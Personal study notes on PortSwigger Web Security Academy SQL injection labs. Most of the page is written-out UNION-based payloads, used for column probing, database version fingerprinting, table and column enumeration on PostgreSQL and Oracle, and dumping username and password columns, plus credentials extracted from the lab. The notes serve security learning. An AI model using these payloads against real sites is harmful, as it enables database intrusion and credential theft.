Port Swigger SQL

https://insecure-website.com/products?category=Gifts'+OR+1=1--

returns all the items from the products table

SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1

Union Select

query example: 

?category='UNION SELECT NULL,NULL,NULL--

How many NULL's do you need to break it?

If it breaks, that means you need to remove the last NULL.

Step2

Try inserting random text like 'a' in replace of NULL and see when it outputs the typed text 

https://ace31f711efbfd54c0d7f268006400a6.web-security-academy.net/filter?category=%27UNION%20SELECT%20NULL,%27RxBAhA%27,NULL--

Step3, Now that we found where the string data resides, we can try to extract valid data. 

?category=%27%20UNION%20SELECT%20username,%20password%20FROM%20users--

  1. Use Burp Suite to intercept and modify the request that sets the product category filter.

  2. Determine the number of columns that are being returned by the query and which columns contain text data. Verify that the query is returning two columns, only one of which contain text, using a payload like the following in the category parameter:

    '+UNION+SELECT+NULL,'abc'--

  3. Use the following payload to retrieve the contents of the users table:

    '+UNION+SELECT+NULL,username||'~'||password+FROM+users--

  4. Verify that the application's response contains usernames and passwords.

Examining the database in SQL

Database typeQuery

Microsoft, MySQL

SELECT @@version

Oracle

SELECT banner FROM v$version

PostgreSQL

SELECT version()

For example, you could use a UNION attack with the following input:

' UNION SELECT @@version--

On Oracle databases, every SELECT statement must specify a table to select FROM. If your UNION SELECT attack does not query from a table, you will still need to include the FROM keyword followed by a valid table name.

There is a built-in table on Oracle called dual which you can use for this purpose. For example: UNION SELECT 'abc' FROM dual

use the cheat sheet.

  1. find how many nulls it can take

  2. find which ones can handle text

  3. put banner in one of the text enabled field and change dual to v$version

%27UNION%20SELECT%20banner,%27b%27%20FROM%20v$version--

MySQL and Mycrosoft Version

  1. Open burp and start intercepting traffic. 

https://ac871f1c1f9100b5c08415c9006a00e2.web-security-academy.net/filter?category=%27UNION%20SELECT%20NULL,NULL#

Determine how many NULLs - 2

2. Determine which column can take string pattern 'a','b'#

Both can take it!

3. Use the cheat sheat to contruct the payload for version

Examining the database in SQL injection attacks

When exploiting SQL injection vulnerabilities, it is often necessary to gather some information about the database itself. This includes the type and version of the database software, and the contents of the database in terms of which tables and columns it contains.

Listing the contents of the database

Most database types (with the notable exception of Oracle) have a set of views called the information schema which provide information about the database.

You can query information_schema.tables to list the tables in the database:

SELECT * FROM information_schema.tables

This returns output like the following:

TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE ===================================================== MyDatabase dbo Products BASE TABLE MyDatabase dbo Users BASE TABLE MyDatabase dbo Feedback BASE TABLE

This output indicates that there are three tables, called Products, Users, and Feedback.

You can then query information_schema.columns to list the columns in individual tables:

SELECT * FROM information_schema.columns WHERE table_name = 'Users'

Practice:

  1. Databse = Oracle (takes -- as comment)

  2. Determine the version PostgreSQL 11.15 (Debian 11.15-1.pgdg90+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18+deb9u1) 6.3.0 20170516, 64-bit

payload 'UNION SELECT version(), NULL--

  1. NULLs - can take 2 and both takes strings.

PostgeSQL uses information_schema for database

  1. What table names does it use?

google "information_schema PostgreSQL"

'UNION SELECT table_name, NULL FROM information_schema.tables--

to determine table names.

Username table found

5. Column names can be found with column_name

filter?category=%27UNION%20SELECT%20column_name,%20NULL%20FROM%20information_schema.columns%20WHERE%20table_name%20=%20%27users_xcdivy%27--

Finally, extract username and password with

'UNION SELECT username_fqsrrh, password_gnbogm FROM users_pdklkk--

administrator
	thy907tsd80g1slzozcg
carlos
	grez8peoyh6ikw2llzpi
wiener
	3reudd22rgieb4729rbr

Equivalent to information schema on Oracle

On Oracle, you can obtain the same information with slightly different queries.

You can list tables by querying all_tables:

SELECT * FROM all_tables

And you can list columns by querying all_tab_columns:

SELECT * FROM all_tab_columns WHERE table_name = 'USERS'

  1. 'UNION SELECT NULL,NULL FROM dual-- (two outputs)

2. show table names. 

filter?category=%27UNION%20SELECT%20table_name,%27a%27%20FROM%20all_tables--

USER$

USERS_EWFXQA

3. retrieve column names

%27UNION%20SELECT%20column_name,%27a%27%20FROM all_tab_columns WHERE table_name = 'USERS_EWFXQA'--

4. retrieve username and password

'UNION SELECT USERNAME_TLXQLS, PASSWORD_QQQZAS FROM USERS_EWFXQA--
PreviousManual SQL injectionNextphp hacks

Last updated